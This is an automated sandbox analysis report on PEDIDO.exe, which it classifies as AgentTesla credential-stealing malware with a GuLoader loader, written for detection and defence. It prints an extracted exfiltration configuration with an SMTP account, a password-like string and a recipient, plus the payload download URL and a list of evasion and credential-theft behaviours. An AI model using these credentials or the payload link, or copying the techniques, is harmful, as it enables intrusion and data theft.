Windows Analysis Report PEDIDO.exe

Overview

General Information

Sample Name: PEDIDO.exe
Analysis ID: 1664
MD5: 8bc016e5779262b772d16903af6e142c
SHA1: 5fa020fa3a63a481eff19fca06e11c424d346e9f
SHA256: 69a8e2fa9664dce4cb9ab2d1a2e7ba67bd0516b9e4c8608e9c246d614be3241f
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: conhost.exe.7136.7.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comsarahmorg434@gmail.com"}
Antivirus detection for URL or domain
Source: http://mail.tccinfaes.com Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: mail.tccinfaes.com Virustotal: Detection: 11% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C2338 CryptUnprotectData, 6_2_1C9C2338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C2A70 CryptUnprotectData, 6_2_1C9C2A70

Compliance:

barindex
Uses 32bit PE files
Source: PEDIDO.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49796 version: TLS 1.2

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.93.227.195 188.93.227.195
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-as-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49827 -> 188.93.227.195:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49827 -> 188.93.227.195:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000003.70287265297.0000000000F61000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74043481824.000000001DD48000.00000004.00000001.sdmp String found in binary or memory: http://1rfE3t8xqRYG9cY.net
Source: RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmp String found in binary or memory: http://1rfE3t8xqRYG9cY.netD
Source: RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmp String found in binary or memory: http://1rfE3t8xqRYG9cY.nett-
Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp String found in binary or memory: http://GkEcfT.com
Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enr
Source: RegAsm.exe, 00000006.00000002.74043153246.000000001DD1B000.00000004.00000001.sdmp String found in binary or memory: http://mail.tccinfaes.com
Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0)
Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: RegAsm.exe, 00000006.00000002.74043153246.000000001DD1B000.00000004.00000001.sdmp String found in binary or memory: http://tccinfaes.com
Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: RegAsm.exe, 00000006.00000002.74032045876.0000000000ED3000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.6.dr String found in binary or memory: http://x1.i.lencr.org/
Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: RegAsm.exe, 00000006.00000002.74032045876.0000000000ED3000.00000004.00000020.sdmp String found in binary or memory: http://x1.i.lencr.org/:Z
Source: RegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org/D
Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org:80/=
Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000006.00000002.74031926505.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: https://doc-0g-as-docs.googleusercontent.com/
Source: RegAsm.exe, 00000006.00000003.69349876616.0000000000EE7000.00000004.00000001.sdmp String found in binary or memory: https://doc-0g-as-docs.googleusercontent.com/%%doc-0g-as-docs.googleusercontent.com
Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp String found in binary or memory: https://doc-0g-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmuj
Source: RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/n
Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP
Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP2Z18XHWq5VUtwT2Ok
Source: RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBPE
Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74042361635.000000001DCB3000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 00000006.00000002.74042361635.000000001DCB3000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-as-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49796 version: TLS 1.2

E-Banking Fraud:

barindex
Drops certificate files (DER)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D Jump to dropped file

System Summary:

barindex
Uses 32bit PE files
Source: PEDIDO.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_00401673 1_2_00401673
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_00401626 1_2_00401626
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_00401437 1_2_00401437
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA5290 1_2_02AA5290
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA1623 1_2_02AA1623
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA1A0E 1_2_02AA1A0E
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA398D 1_2_02AA398D
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA6733 1_2_02AA6733
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA071E 1_2_02AA071E
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA391C 1_2_02AA391C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A41130 6_2_00A41130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A43A50 6_2_00A43A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A4BA58 6_2_00A4BA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A44320 6_2_00A44320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A4C7B8 6_2_00A4C7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A43708 6_2_00A43708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00AA6D90 6_2_00AA6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00AA07E0 6_2_00AA07E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00B3C04B 6_2_00B3C04B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00B3BF79 6_2_00B3BF79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E478D0 6_2_00E478D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E4F540 6_2_00E4F540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E47A3F 6_2_00E47A3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E4D7A8 6_2_00E4D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E46728 6_2_00E46728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E444F8 6_2_00E444F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00E43330 6_2_00E43330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C7096 6_2_1C9C7096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9CAC28 6_2_1C9CAC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C6908 6_2_1C9C6908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9CF260 6_2_1C9CF260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9CCB97 6_2_1C9CCB97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C0006 6_2_1C9C0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C0040 6_2_1C9C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9C6148 6_2_1C9C6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1FD45E08 6_2_1FD45E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1FD44ACC 6_2_1FD44ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1FD45DC1 6_2_1FD45DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1FD46AF1 6_2_1FD46AF1
Sample file is different than original file name gathered from version info
Source: PEDIDO.exe, 00000001.00000000.68987414671.0000000000416000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLurifaksernes.exe vs PEDIDO.exe
Source: PEDIDO.exe Binary or memory string: OriginalFilenameLurifaksernes.exe vs PEDIDO.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\PEDIDO.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edgegdi.dll Jump to behavior
Source: PEDIDO.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PEDIDO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PEDIDO.exe 'C:\Users\user\Desktop\PEDIDO.exe'
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe File created: C:\Users\user\AppData\Local\Temp\~DFFF706F9495D122F7.TMP Jump to behavior
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@10/3@4/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.69378058879.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_00405AC6 push esi; ret 1_2_00405ACD
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_004046A8 push es; ret 1_2_004046EF
Source: C:\Users\user\Desktop\PEDIDO.exe Code function: 1_2_02AA095A push es; retf 1_2_02AA095C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_1C9CAC28 push edi; retn 1C9Ch 6_2_1C9CC81D

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
